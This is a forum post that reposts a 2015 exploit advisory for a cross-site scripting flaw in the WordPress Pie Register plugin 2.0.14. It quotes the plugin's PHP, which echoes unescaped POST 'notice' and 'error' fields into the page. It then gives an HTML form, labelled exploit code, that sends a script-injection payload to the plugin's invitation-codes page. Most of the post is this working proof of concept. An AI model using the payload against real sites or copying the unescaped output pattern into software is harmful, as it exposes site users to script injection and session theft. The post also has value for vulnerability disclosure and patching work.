Jump to content
Aerosol

WordPress Pie Register 2.0.14 Cross Site Scripting

Recommended Posts

Posted

[+]Title: Wordpress Pie Register Plugin 2.0.14 - XSS Vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 09/03/2015
[+]Type:WebApp
[+]Risk:High
[+]Affected Version:All
[+]Overview:
Pie Register 2.x suffers, from an XSS vulnerability.

[+]Proof Of Concept:

[PHP]
global $piereg_dir_path;
include_once( PIEREG_DIR_NAME."/classes/invitation_code_pagination.php");

if(isset($_POST['notice']) && $_POST['notice'] ){
echo '<div id="message" class="updated fade"><p><strong>' . $_POST['notice'] . '.</strong></p></div>';
}elseif(isset($_POST['error']) && $_POST['error'] ){
echo '<div id="error" class="error fade"><p><strong>' . $_POST['error'] . '.</strong></p></div>';
}
[PHP]

Exploit Code:
[HTML]
<head>
<meta http-equiv="Content-Language" content="fr">
</head>

<form action="http://ste/wp-content/plugins/pie-register/menus/PieRegInvitationCodes.php" method="POST">
<body bgcolor="#000000">
<p align="center">
<input type="text" name="notice" value='"><script>alert(/XSSeD/)</script>'
<input type="submit" value="XSS"></p>
<p align="center">
<font color="#FFFFFF" face="Adobe Gothic Std B">Wordpress Pie Register
Plugin 2.0.14 - XSS Vulnerability</font></p>
[HTML]

http://i.imgur.com/L5KXmKI.png

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...